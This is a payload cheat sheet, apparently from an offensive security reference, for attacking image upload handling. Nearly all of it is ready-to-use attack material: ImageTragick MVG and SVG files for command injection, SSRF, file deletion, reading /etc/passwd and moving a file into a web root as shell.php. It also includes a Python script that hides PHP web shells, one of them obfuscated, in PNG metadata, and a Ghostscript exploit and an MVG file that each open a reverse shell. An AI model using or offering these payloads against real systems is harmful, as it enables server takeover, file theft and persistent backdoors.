Images - Documentation

Link to this headingImage Uploads

Link to this headingImageTragic Files

ImageTragic Shell Execution (exploit.mvg):

push graphic-context viewbox 0 0 640 480 fill 'url(https://example.com/image.jpg";|ls "-la)' pop graphic-context

ImageTragic Shell Execution (exploit.svg):

<?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd";> <svg width="640px" height="480px" version="1.1" xmlns="http://www.w3.org/2000/svg"; xmlns:xlink= "http://www.w3.org/1999/xlink";> <image xlink:href="https://example.com/image.jpg"|ls "-la" x="0" y="0" height="640px" width="480px"/> </svg>

ImageTragic Reverse Shell Execution (exploit.mvg):

push graphic-context encoding "UTF-8" viewbox 0 0 1 1 affine 1 0 0 1 0 0 push graphic-context image Over 0,0 1,1 '|/bin/sh -i > /dev/tcp/ip/80 0<&1 2>&1' pop graphic-context pop graphic-context

ImageTragic SSRF (ssrf.mvg):

push graphic-context viewbox 0 0 640 480 fill 'url(http://example.com/)' pop graphic-context

ImageTragic File Deletion (delete_file.mvg):

push graphic-context viewbox 0 0 640 480 image over 0,0 0,0 'ephemeral:/tmp/delete.txt' pop graphic-context

ImageTragic File Move (file_move.mvg):

push graphic-context viewbox 0 0 640 480 image over 0,0 0,0 'msl:/tmp/msl.txt' pop graphic-context

ImageTragic File Move (file_move.svg):

<?xml version="1.0" encoding="UTF-8"?> <image> <read filename="/tmp/image.gif" /> <write filename="/var/www/shell.php" /> </image>

ImageTragic File Read (file_read.mvg):

push graphic-context viewbox 0 0 640 480 image over 0,0 0,0 'label:@/etc/passwd' pop graphic-context

Link to this headingImage LFI

PNG Generator:

from PIL import Image # Shellcodes - Bypass included : Keyword Recognition : System, GET, php # --- How to use : http://localhost/shell.php?c=echo%20'<pre>';ls #shellcode = "<?=@`$_GET[c]`;" shellcode = "<?php system($_GET['c']); ?>" # --- How to use : http://localhost/shell.php?_=system&__=echo%20'<pre>';ls shellcode2 = "<?='Sh3ll'; $_='{';$_=($_^'<').($_^'>;').($_^'/');?><?=${'_'.$_}['_'](${'_'.$_}['__']);?>" print("\n[+] Advanced Upload - Shell inside metadatas of a PNG file") # Create a backdoored PNG print(" - Creating a payload.png") im = Image.new("RGB", (10,10), "Black") im.info["shell"] = shellcode reserved = ('interlace', 'gamma', 'dpi', 'transparency', 'aspect') # undocumented class from PIL import PngImagePlugin meta = PngImagePlugin.PngInfo() # copy metadata into new object for k,v in im.info.items(): if k in reserved: continue meta.add_text(k, v, 0) im.save("payload.png", "PNG", pnginfo=meta) print("Done")

GhostScript Exploit:

%!PS userdict /setpagedevice undef legal { null restore } stopped { pop } if legal mark /OutputFile (%pipe%bash -c 'bash -i >& /dev/tcp/test.example.com/80 0>&1') currentdevice putdeviceprops